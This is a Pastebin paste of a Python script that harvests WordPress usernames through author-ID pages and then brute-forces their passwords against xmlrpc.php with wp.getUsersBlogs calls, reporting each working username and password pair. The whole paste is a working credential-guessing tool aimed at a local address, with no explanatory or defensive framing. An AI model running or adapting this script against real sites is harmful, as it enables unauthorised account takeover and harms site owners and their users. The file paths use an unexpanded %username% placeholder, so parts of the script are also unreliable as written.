SHARE
TWEET

Untitled

a guest Oct 12th, 2017 70 in 6 days
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import requests, itertools
  2. import multiprocessing
  3. from lxml import html
  4.  
  5. XML = '''
  6. <?xml version="1.0" encoding="UTF-8"?>
  7. <methodCall>
  8. <methodName>wp.getUsersBlogs</methodName>
  9. <params>
  10. <param>
  11.  <value>
  12.   <string>{username}</string>
  13.  </value>
  14. </param>
  15. <param>
  16.  <value>
  17.   <string>{password}</string>
  18.  </value>
  19. </param>
  20. </params>
  21. </methodCall>
  22. '''
  23.  
  24. TARGET_URL = 'http://192.168.1.6/xmlrpc.php'
  25. AUTHOR_URL = 'http://192.168.1.6/?author={id}'
  26.  
  27. # - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28.  
  29. def wrap_creds_in_xml(username="", password=""):
  30.     return XML.format(username=username, password=password)
  31.  
  32.  
  33. def is_correct(text=""):
  34.     constant = 'Incorrect username or password'
  35.     return constant not in text
  36.  
  37.  
  38. def get_usernames():
  39.     start_id = 1
  40.     f = open('C:\\Users\\%username%\\Desktop\\username.txt', 'w')
  41.  
  42.     while True:
  43.         r = requests.get(AUTHOR_URL.format(id=start_id))
  44.         tree = html.fromstring(r.content)
  45.         title = tree.findtext('.//title')
  46.         if "Page not found – user's Blog!" in title:
  47.             f.close()
  48.             break
  49.  
  50.         f.write(title.split()[0] + '\n')
  51.         start_id += 1
  52.  
  53.     with open('C:\\Users\\%username%\\Desktop\\username.txt') as file:
  54.         text_as_string = file.read()
  55.         return text_as_string.split()
  56.  
  57. def get_passwords():
  58.     with open('C:\\Users\\%username%\\Desktop\\passwords.txt') as file:
  59.         text_as_string = file.read()
  60.         return text_as_string.split('\n')
  61.  
  62. def main():
  63.     users = get_usernames()
  64.     passwords = get_passwords()
  65.  
  66.     for user, password in itertools.product(users, passwords):
  67.         payload = wrap_creds_in_xml(username=user, password=password)
  68.         response = requests.post(TARGET_URL, payload)
  69.         correct = is_correct(text=response.text)
  70.         if correct:
  71.             print('[+] {}/{}'. format(user, password))
  72.         else:
  73.             print('[-] {}/{} '.format(user, password))
  74.  
  75. if __name__ == '__main__':
  76.     main()
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top